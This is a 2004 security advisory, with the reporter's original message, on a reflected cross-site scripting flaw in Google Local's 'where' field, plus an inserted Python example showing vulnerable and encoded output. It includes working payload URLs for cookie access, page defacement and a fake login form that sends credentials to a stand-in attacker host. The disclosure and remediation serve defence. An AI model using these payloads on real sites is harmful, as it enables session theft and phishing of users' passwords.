SecurityTracker.com
Category:   Application (Generic)  >   Google
Vendors:   Google
Google Local Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1012081
SecurityTracker URL:  http://securitytracker.com/id/1012081
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  Nov 10 2004
Original Entry Date:  Nov 4 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes

Description:   Lostmon reported an input validation vulnerability in Google Local service. A remote user can conduct cross-site scripting attacks.

It is reported that the Google Local service does not properly validate user-supplied input in the 'where' field. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the Google site and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/local?hl=es&lr=&q=xx&near=%3Cbody%3E%3Ch1%3EXSS%2520poW@%21%21%3Ch1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%2Fbody%3E&btnG=B%C3%BA

The vendor has been notified.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the Google Local site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor issued a fix on November 4, 2004.
Vendor URL:  www.google.com/
Cause:   Input validation error

Message History:   None.
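
The flaw described above is a missing output-encoding step on the value of the `near` parameter (the 'where' box). The following Python code is an added example, not code from the advisory, the reporter or Google: it echoes that parameter into a hypothetical results template with and without HTML encoding. The template, the function names and the host `target.example` are assumptions.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Demonstration URL from the advisory with the mail encoding (=3D, soft line
# breaks) undone. The host is a placeholder; the btnG value is truncated on
# the page and is kept truncated here.
DEMO_URL = (
    "http://target.example/local?hl=es&lr=&q=xx"
    "&near=%3Cbody%3E%3Ch1%3EXSS%2520poW@%21%21%3Ch1%3E"
    "%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%2Fbody%3E"
    "&btnG=B%C3%BA"
)

# Hypothetical template: the value is reflected in two HTML contexts, an
# attribute (the refilled search box) and element text (the results header).
PAGE = '<input name="near" value="{0}"><p>Results near <b>{0}</b></p>'


def query_param(url, name):
    """Return the once-decoded value of a query parameter ('' if absent)."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return values.get(name, [""])[0]


def render_vulnerable(near):
    """Echo the parameter as-is: markup in the URL becomes markup in the page."""
    return PAGE.format(near)


def render_hardened(near):
    """Entity-encode at output time; quote=True also covers the attribute."""
    return PAGE.format(html.escape(near, quote=True))


if __name__ == "__main__":
    near = query_param(DEMO_URL, "near")
    print(render_vulnerable(near))
    print(render_hardened(near))
```

Encoding is applied where the value is written into the page, not where it is read, so the same stored or logged value stays intact for other uses.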


 Source Message Contents

Subject:  local.google XSS holes and remote file inclusion and remote command execution via remote file inclusion


####################################################
Google local XSS vulnerability, remote file inclusion, and remote
execution command (via remote file inclusion)
os: win 2000 sp4 IE 6.x with all fixes
vendor url: http://www.google.es/lochp http://local.google.com/
original advisory: http://lostmon.spymac.net/blog/
####################################################

Google Local helps you focus your search on a specific geographic
location. Sometimes you want to search the whole worldwide web, and
sometimes you just want to find an auto parts store within walking
distance.

But it has a problem: it does not strip tags of HTML code. An attacker
writes some word in the box labeled "what" and can write some code in the
box labeled "where", and this code is executed. An attacker can make a
special URL to spoof the web or spoof the search results, or spoof
any content that you look at.

Demonstration exploits:

hack cookie:

http://www.google.es/local?hl=es&lr=&q=xx&near=%3Cbody%3E%3Ch1%3EXSS%2520poW@%21%21%3Ch1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%2Fbody%3E&btnG=B%C3%BA

inclusion of some content (an image and writing in the page):

http://local.google.com/local?hl=es&lr=&q=lalala&near=%3Cbody%3E%3Cp%3E%3Ch1%3EGoogle+hacked+%21%21%21+lostmon+was+here+%3AD%3C%2Fh1%3E%3C%2Fp%3E%3Cp%3ENo+les+abandones+%2C+ellos+no+lo+harian%3C%2Fp%3E%3Cimg+src%3D%22http%3A%2F%2Fwww.kellypocharaquel.com.ar%2Fimages%2FGata_Misha_con_cria.jpg%22+alt%3D%22Google+Local%22%3E%3C%2Fbody%3E&btnG=B%C3%BAsqueda

phishing or spoofing and inclusion of a remote file (database) for inclusion
of passwords and users:

http://local.google.com/local?hl=es&lr=&q=cafe&near=%3Cbody%3E%3Cform+action%3D%22http%3A%2F%2Fwww.atacker.com%2Fsavedb.asp%22+method%3D%22post%22%3EUsername%3A%3Cinput+name%3D%22username%22+type%3D%22text%22+maxlength%3D%2230%22%3E%3Cbr%3EPassword%3A%3Cinput+name%3D%22password%22+type%3D%22text%22+maxlength%3D%2230%22%3E%3Cbr%3E%3Cinput+name%3D%22login%22+type%3D%22submit%22+value%3D%22Login%22%3E%3C%2Fform%3E%3C%2Fbody%3E&btnG=B%C3%BAsqueda

It is a very big security hole :////

enjoy and have a nice day :)

Sincerely:

Lostmon (Lostmon@Gmail.com)

Thanks to www.Ayuda-Internet.net for their support
Thanks to Estrella for being my light
Ipy :*****

--
Curiosity is what makes the mind move....
 
 



Copyright 2019, SecurityGlobal.net LLC